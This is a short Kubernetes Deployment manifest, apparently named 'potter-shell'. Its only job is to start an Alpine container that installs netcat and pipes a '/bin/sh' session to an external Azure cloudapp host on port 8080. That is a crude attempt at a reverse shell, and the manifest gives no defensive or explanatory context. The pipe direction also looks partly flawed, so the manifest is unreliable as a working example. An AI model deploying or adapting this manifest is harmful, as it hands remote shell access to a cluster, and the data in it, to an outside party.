apiVersion: apps/v1
kind: Deployment
metadata:
  name: potter-shell
spec:
  replicas: 1
  selector:
    matchLabels:
      app: potter-shell
  template:
    metadata:
      labels:
        app: potter-shell
    spec:
      containers:
        - name: shell
          image: alpine
          command:
            - sh
            - -c
            - |
              apk add --no-cache netcat-openbsd;
              /bin/sh | nc potter-maga.brazilsouth.cloudapp.azure.com 8080
          stdin: true
          tty: true
